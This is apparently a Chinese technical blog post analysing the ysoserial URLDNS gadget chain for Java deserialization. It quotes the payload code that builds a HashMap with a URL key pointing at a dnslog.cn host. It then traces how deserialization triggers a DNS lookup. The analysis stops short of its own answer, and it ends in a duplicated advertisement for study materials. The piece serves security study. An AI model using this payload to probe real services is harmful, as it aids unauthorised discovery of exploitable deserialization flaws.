Java反序列化之ysoserial URLDNS模块分析

然后通过反射创建Class类对应的对象，走完这句代码，URLDNS对象创建完成。

final Object object = payload.getObject(“http://lyxhh.dnslog.cn”);

接着执行URLDNS对象中的getObject方法。

getObject方法中：

URLStreamHandler handler = new SilentURLStreamHandler();

创建了URLStreamHandler对象，该对象的作用，后面我们会详细说到。

接着：

HashMap ht = new HashMap();

创建了HashMap对象：

URL u = new URL(null, “http://lyxhh.dnslog.cn”, handler);

URL对象：

ht.put(u, “http://lyxhh.dnslog.cn”);

将URL对象作为HashMap中的key，dnslog地址为值，存入HashMap中。

Reflections.setFieldValue(u, “hashCode”, -1);

通过反射机制 设置URL对象的成员变量hashCode值为-1，为什么要设置值为-1，这问题在反序列化时会详细说到。

将HashMap对象返回 return ht; ，接着对 HashMap对象 进行序列化操作 Serializer.serialize(object, out); 并将序列化的结果重定向到 dnslog.ser 文件中。

由于HashMap中重写了writeObject方法，因此在进行序列化操作时，执行的序列化方法是HashMap中的writeObject方法，具体如下：

先执行默认的序列化操作:

接着 遍历HashMap，对HashMap中的key，value进行序列化。

综上所述，梳理下ysoserial payload，URLDNS 序列化的整个过程：

• 首先 ysoserial 通过反射的方式，根据全限定类名 ysoserial.payloads.URLDNS ，获取对应的Class类对象，并通过Class类对象的 newInstance() 方法，获取URLDNS对象。

• 接着执行URLDNS对象中的getObject方法。

• 在getObject方法中，创建了URLStreamHandler 对象 URLStreamHandler handler = new SilentURLStreamHandler(); ，该对象会被URL对象引用。

• 创建HashMap对象 HashMap ht = new HashMap(); ，URL对象 URL u = new URL(null, "http://lyxhh.dnslog.cn", handler); 。

• 将URL对象作为HashMap中的Key，DNSLOG的地址作为HashMap中的值 HashMap.put(u, "http://lyxhh.dnslog.cn");

• 通过反射的方式 Reflections.setFieldValue(u, "hashCode", -1); ，设置URL对象中的成员变量hashCode值为-1。

• 返回HashMap对象。

• 然后对HashMap对象进行序列化操作 Serializer.serialize(HashMap object, out);

整个序列化过程中，有几个问题： 1、为什么要创建URLStreamHandler 对象，URL对象中默认的URLStreamHandler 对象不香吗。 2、为什么要设置URL对象中的成员变量hashCode值为-1。

反序列化分析

读取上述操作生成的 dnslog.ser 文件，执行反序列化，触发DNSLOG请求:

为什么HashMap的反序列化过程会发送DNSLOG请求呢？

在进行反序列化操作时，由于HashMap中重写了readObject方法，因此执行的反序列化方法是HashMap中的readObject方法，如下：

private void readObject(java.io.ObjectInputStream s)

throws IOException, ClassNotFoundException {

// Read in the threshold (ignored), loadfactor, and any hidden stuff

s.defaultReadObject(); // 执行默认的反序列化方法

reinitialize(); //初始化变量值

if (loadFactor <= 0 || Float.isNaN(loadFactor))

throw new InvalidObjectException("Illegal load factor: " +

loadFactor);

s.readInt(); // Read and ignore number of buckets

int mappings = s.readInt(); // Read number of mappings (size)

if (mappings < 0)

throw new InvalidObjectException("Illegal mappings count: " +

mappings);

else if (mappings > 0) { // (if zero, use defaults)

// Size the table using given load factor only if within

// range of 0.25...4.0

float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);

float fc = (float)mappings / lf + 1.0f;

int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?

DEFAULT_INITIAL_CAPACITY :

(fc >= MAXIMUM_CAPACITY) ?

MAXIMUM_CAPACITY :

tableSizeFor((int)fc));

float ft = (float)cap * lf;

threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?

(int)ft : Integer.MAX_VALUE);

@SuppressWarnings({"rawtypes","unchecked"})

Node<K,V>[] tab = (Node<K,V>[])new Node[cap];

table = tab;

// Read the keys and values, and put the mappings in the HashMap

for (int i = 0; i < mappings; i++) {

@SuppressWarnings("unchecked")

K key = (K) s.readObject(); // 遍历hashmap，进行反序列化操作，还原key值，这里的key值，是URL对象。

@SuppressWarnings("unchecked")

V value = (V) s.readObject(); // 还原value值，这里的value值，是dnslog的请求地址，http://lyxhh.dnslog.cn

putVal(hash(key), key, value, false, false); //对key进行hash计算，确保唯一，并构造Hashmap对象。

}

}

}

readObject中，先执行默认的反序列化方法，接着还原HashMap，并计算Key，如下：

这里我们跟进hash(key)方法中。

接着执行了 key.hashCode() ，而key是URL对象，因此执行的是URL对象中的hashCode方法，继续跟进。

在序列化操作时，已经通过反射设置了URL的hashCode等于-1，因此这里会直接进入到 handler.hashCode(this); 中。

hashCode方法中会执行 getHostAddress(URL u) 方法，方法中调用了 InetAddress.getByName(host); 函数，从而发送DNSLOG请求。

使用 InetAddress.getByName(host); ，发送DNSLOG请求。

综上所述，梳理下ysoserial payload，URLDNS 反序列化的整个过程：

• 首先 HashMap 重写了readObject方法，因此在反序列化过程中，执行的反序列化方法是HashMap中的readObject方法。

• 在HashMap中的readObject方法中，会对Key进行hash计算 key.hashCode() ，而Key是URL对象，执行URL对象的hashCode方法。

• 在URL.hashCode方法中，当hashCode成员变量值为-1时，会执行URLStreamHandler.hashCode()方法。

• 在URLStreamHandler.hashCode()方法中，会执行 getHostAddress(URL u) 方法。

• 在 getHostAddress(URL u) 方法中，会执行 InetAddress.getByName(host); ，从而发送DNSLOG请求。

解决序列化时遗留的问题

1、为什么要创建URLStreamHandler 对象，URL对象中默认的URLStreamHandler 对象不香吗。

URLDNS中getObject方法中。

public Object getObject(final String url) throws Exception {

URLStreamHandler handler = new SilentURLStreamHandler();

HashMap ht = new HashMap();

URL u = new URL(null, url, handler);

ht.put(u, url);

Reflections.setFieldValue(u, "hashCode", -1);

return ht;

}

URLStreamHandler handler = new SilentURLStreamHandler();

创建了URLStreamHandler 对象。

这里我们先来看下SilentURLStreamHandler类。

static class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {

return null;

}

protected synchronized InetAddress getHostAddress(URL u) {

return null;

}

}

SilentURLStreamHandler类继承URLStreamHandler，重写了openConnection，getHostAddress方法，将方法的实现置空了。

然后将handler传递给了URL构造函数。

URL u = new URL(null, url, handler);

在URL构造函数中，如果handler存在，则执行 this.handler = handler;

接着我们执行了HashMap的put方法 ht.put(u, url); ，这里我们跟下put方法，如下：

在put方法中，执行了hash(key)方法，我们跟进hash方法：

跟进hashCode方法：

最后

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数Java工程师，想要提升技能，往往是自己摸索成长，自己不成体系的自学效果低效漫长且无助。

因此收集整理了一份《2024年Java开发全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Java开发知识点，不论你是刚入门Java开发的新手，还是希望在技术上不断提升的资深开发者，这些资料都将为你打开新的学习之门！

如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！
集整理了一份《2024年Java开发全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。**

[外链图片转存中…(img-RQSSshmb-1715725215034)]

[外链图片转存中…(img-QqkwjlrJ-1715725215034)]

[外链图片转存中…(img-NDqxYLsI-1715725215035)]

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Java开发知识点，不论你是刚入门Java开发的新手，还是希望在技术上不断提升的资深开发者，这些资料都将为你打开新的学习之门！

如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！